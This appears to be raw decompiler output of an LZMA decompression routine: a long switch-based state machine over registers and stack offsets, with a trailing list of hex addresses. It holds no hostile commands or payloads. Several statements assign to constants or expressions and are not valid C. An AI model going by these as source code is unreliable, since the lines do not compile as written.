											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406767
0x00406767
0x0040676b
0x00406790
0x0040679a
0x00000000
0x0040676d
0x0040676d
0x00406770
0x00406774
0x00406777
0x0040677a
0x0040677e
0x0040677e
0x00406781
0x0040685b
0x0040685b
0x00406862
0x00406862
0x00406865
0x0040686c
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00406819
0x00406819
0x00406819
0x00405fb5
0x00405fb5
0x00405fb5
0x00405fbe
0x00000000
0x00000000
0x00405fc4
0x00000000
0x00405fcf
0x00000000
0x00000000
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe2
0x00000000
0x00000000
0x00405fe8
